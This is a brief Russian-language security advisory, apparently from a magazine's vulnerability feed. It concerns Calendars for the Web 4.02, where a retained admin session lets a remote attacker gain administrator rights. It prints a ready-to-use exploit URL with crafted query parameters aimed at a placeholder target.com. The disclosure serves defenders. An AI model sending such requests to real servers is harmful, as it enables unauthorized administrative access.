Хакер #305. Многошаговые SQL-инъекции
Программа: Calendars for the Web 4.02
Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за того, что страница
администрирования сохраняет предыдущую сессию. Атакующий посетивший страницу
администрирования получить доступ с привилегиями администратора на целевую
систему.
Эксплоит:
Перед атакой: target.com/calendarWeb/cgi-bin/calweb/calweb.exe
После атаки:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0
Пример:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0